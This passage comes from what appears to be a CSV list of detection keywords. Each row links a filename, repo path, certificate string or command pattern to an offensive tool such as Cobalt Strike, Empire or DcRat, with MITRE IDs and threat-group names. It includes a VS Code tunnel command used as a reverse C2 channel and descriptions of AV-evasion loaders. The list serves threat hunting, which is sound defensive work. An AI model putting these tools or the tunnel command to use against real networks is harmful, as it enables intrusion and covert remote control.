widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cmVmbGVjdGl2ZQ==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*CN=PortSwigger*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*CN=ShadowSpray*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*cnotin/SplunkWhisperer2*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*Coalfire-Research*,offensive_tool_keyword,Github Username,Red team exploitation tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Coalfire-Research,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Coalfire-Research/Slackor*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*Cobalt Strike external C2*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*Cobalt Strike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltclip.cna*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*cobaltclip.exe*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*cobaltstrike *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike*,offensive_tool_keyword,cobaltstrike,cobaltstrike binary for windows - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations. these assessments benefit security operations and incident response.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike-*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobalt-strike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*-cobaltstrike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike.*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*CobaltStrike.LJ!MTB*,signature_keyword,Antivirus Signature,windows defender antivirus signature for UAC bypass,N/A,N/A,N/A,N/A,C2,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike.store*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*cobaltstrike/*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike_*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike-dist.tgz*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*cobbr/Covenant*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*cobbr/Elite*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*cobbr/PSAmsi*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*cocfojppfigjeefejbpfmedgjbpchcng*,greyware_tool_keyword,SaferVPN Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*code.exe tunnel --accept-server-license-terms --name *,greyware_tool_keyword,vscode,Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets,T1090.003 - T1059.001 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://badoption.eu/blog/2023/01/31/code_c2.html,1,0,risk of False positive,10,10,N/A,N/A,N/A,N/A -*code_execution/*.dll*,offensive_tool_keyword,empire,Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*code_execution/*.exe*,offensive_tool_keyword,empire,Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*code_execution/*.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*CodeExec-D37DA402-3829-492F-90D0-8EC3909514EB.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*CodeLoad(shellcode)*,offensive_tool_keyword,cobaltstrike,ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus 